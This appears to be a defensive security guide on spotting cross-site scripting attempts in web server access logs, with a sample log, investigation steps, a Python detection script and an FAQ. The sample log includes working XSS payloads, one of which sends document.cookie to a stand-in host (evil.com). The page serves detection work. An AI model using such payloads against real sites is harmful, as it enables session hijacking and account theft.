XSS Attack Log Detection


What This Means

Detect Cross-Site Scripting (XSS) attacks in web server logs. Identify reflected, stored, and DOM-based XSS attempts targeting your web application users.

Example Log

-- Access log showing XSS probing:
203.0.113.55 - - [08/Mar/2026:15:10:22 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4521
203.0.113.55 - - [08/Mar/2026:15:10:24 +0000] "GET /search?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4530
203.0.113.55 - - [08/Mar/2026:15:10:26 +0000] "GET /profile?name="><svg/onload=fetch('https://evil.com/steal?c='+document.cookie)> HTTP/1.1" 200 3201

Indicators of Suspicious Activity

How to Investigate

  1. Search access logs for URL-decoded HTML tags and JavaScript event handlers
  2. Identify which parameters on which endpoints are being targeted
  3. Check if the application reflects the injected content back (reflected XSS)
  4. Review if any payloads include data exfiltration URLs (cookie stealing)
  5. Test the targeted endpoints to verify if XSS is actually exploitable
  6. Check stored data (comments, profiles, messages) for persisted XSS payloads
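
Steps 1, 2 and 4 applied to the three sample lines from the example log, as an added example (not code from this page or its scanner). The function names, the indicator regexes and the assumption of common/combined log format are illustrative choices.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Constructed input: the three sample lines from the example log on this page.
SAMPLE_LOG = """\
203.0.113.55 - - [08/Mar/2026:15:10:22 +0000] "GET /search?q=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 4521
203.0.113.55 - - [08/Mar/2026:15:10:24 +0000] "GET /search?q=%22%3E%3Cimg%20src=x%20onerror=alert(1)%3E HTTP/1.1" 200 4530
203.0.113.55 - - [08/Mar/2026:15:10:26 +0000] "GET /profile?name="><svg/onload=fetch('https://evil.com/steal?c='+document.cookie)> HTTP/1.1" 200 3201
"""
# Greedy (.*) keeps a raw '"' inside the URL (third line) from ending the request early.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (.*) HTTP/[\d.]+" (\d{3}) \S+$')
# Illustrative indicator patterns (assumption), matched against decoded parameter values.
INDICATORS = {
    "html_tag": re.compile(r"<\s*/?\s*[a-z!]", re.I),
    "event_handler": re.compile(r"\bon[a-z]{3,}\s*=", re.I),
    "js_scheme": re.compile(r"javascript\s*:", re.I),
    "cookie_access": re.compile(r"document\s*\.\s*cookie", re.I),
}
URL_RE = re.compile(r"https?://([^/\s'\"<>?]+)", re.I)

def decode(value, rounds=3):
    # Decode repeatedly so double-encoded payloads (%253C) are still seen.
    for _ in range(rounds):
        value = unquote_plus(value)
    return value

def scan(log_text):
    findings = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target, status = m.groups()
        path, _, query = target.partition("?")
        for pair in query.split("&"):
            name, _, raw = pair.partition("=")
            value = decode(raw)
            hits = [k for k, rx in INDICATORS.items() if rx.search(value)]
            if hits:
                # Status 200 only shows the request was served, not that the payload was reflected.
                findings.append({"ip": ip, "endpoint": path, "param": name, "status": int(status),
                                 "indicators": hits, "exfil_hosts": URL_RE.findall(value)})
    return findings

def targeted(findings):
    """Count hits per (endpoint, parameter) to show what is being probed."""
    return Counter((f["endpoint"], f["param"]) for f in findings)
```

Reflection (step 3) and stored payloads (step 6) cannot be confirmed from access logs alone; they need the response bodies and the application's stored data.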

Recommended Mitigations


Frequently Asked Questions

What are the types of XSS attacks?
Three types: Reflected XSS (payload in the URL reflected back to the user), Stored XSS (payload saved in the database and served to other users), and DOM-based XSS (payload processed by client-side JavaScript without server involvement).
Why is XSS dangerous?
XSS allows attackers to execute JavaScript in other users' browsers. This enables session hijacking (stealing cookies), account takeover, defacement, phishing, keylogging, and malware distribution.
Does a WAF fully protect against XSS?
A WAF catches many XSS patterns but cannot prevent all attacks. Skilled attackers craft payloads that bypass WAF rules. Defense in depth — WAF plus output encoding plus CSP headers — is required.